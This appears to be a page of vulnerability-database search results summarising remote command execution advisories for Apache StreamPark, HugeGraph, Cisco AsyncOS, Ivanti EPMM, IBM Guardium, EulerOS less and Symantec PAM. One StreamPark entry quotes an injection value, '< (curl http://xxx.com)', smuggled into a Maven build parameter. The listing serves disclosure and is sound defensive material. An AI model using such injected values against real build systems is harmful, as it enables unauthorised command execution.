19630 matches found
Apache Hugegraph 1.0.0 < 1.3.0 Remote Command Execution
Apache Hugegraph versions from 1.0.0 and prior to 1.3.0 are affected by a vulnerability allowing an unauthenticated attacker to execute remote commands via a specially forged request. No source data...
GHSA-5V69-92VW-FMJH Apache StreamPark: maven build params could trigger remote command execution
In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and...
GHSA-7G94-HFQC-Q993 Apache StreamPark: Unchecked maven build params could trigger remote command execution
In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and...
CVE-2024-29737
In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and...
CVE-2023-52291
In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and...
CVE-2024-29737
CVE-2024-29737 concerns a command-injection flaw in Apache StreamPark (Project module). The vulnerability arises from lax validation of build parameters in the Maven integration, allowing an authenticated user with system-level permissions to inject commands via the Build Argument (demonstrated b...
CVE-2024-29737 Apache StreamPark (incubating): maven build params could trigger remote command execution
In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and...
CVE-2023-52291
CVE-2023-52291 concerns Apache StreamPark. The vulnerability stems from lax validation of maven build parameters in the StreamPark project module, allowing command injection when the input parameter < is used (for example, < (curl http://xxx.com)). An attack requires the user to be logged i...
CVE-2023-52291 Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and...
PT-2024-5447 · Cisco · Cisco Asyncos
Name of the Vulnerable Software and Affected Versions: Cisco AsyncOS for Secure Email Gateway (affected versions not specified). Description: A vulnerability in the web-based management interface of Cisco AsyncOS for Secure Email Gateway could allow an authenticated, remote attacker to execute...
PT-2024-5158 · Ivanti · Ivanti Endpoint Manager Mobile
Name of the Vulnerable Software and Affected Versions: Ivanti Endpoint Manager Mobile (EPMM) versions prior to 12.1.0.1. Description: The issue is related to an insufficient authorization vulnerability in the web component of EPMM. This vulnerability allows an unauthorized attacker within the networ...
The vulnerability of the IBM Security Guardium security tool arises from the failure to take measures to neutralize special elements used in the operating system’s command set. This allows attackers to execute arbitrary commands.
The vulnerability of the IBM Security Guardium information protection tool exists because measures to neutralize special elements used in the operating system have not been implemented. Exploiting this vulnerability allows a malicious actor to execute arbitrary commands remotely...
EulerOS 2.0 SP9 : less (EulerOS-SA-2024-1965)
According to the versions of the less package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities: closealtfile in filename.c in less before 606 omits shellquote calls for LESSCLOSE. (CVE-2022-48624) less through 653 allows OS command execution via a...
CVE-2024-38494
This vulnerability allows a high-privileged authenticated PAM user to achieve remote command execution on the affected PAM system by sending a specially crafted HTTP request...
CVE-2024-36455
An improper input validation allows an unauthenticated attacker to achieve remote command execution on the affected PAM system by sending a specially crafted HTTP request...
CVE-2024-36456
This vulnerability allows an unauthenticated attacker to achieve remote command execution on the affected PAM system by uploading a specially crafted PAM upgrade file...
CVE-2024-38494 Symantec Privileged Access Manager Remote Command Execution vulnerability
This vulnerability allows a high-privileged authenticated PAM user to achieve remote command execution on the affected PAM system by sending a specially crafted HTTP request...
CVE-2024-38494
Broadcom Symantec Privileged Access Management (PAM) contains a vulnerability that, when exploited by a high-privileged authenticated PAM user, enables remote command execution on the affected PAM system via a specially crafted HTTP request. Affected component appears to be the PAM software itsel...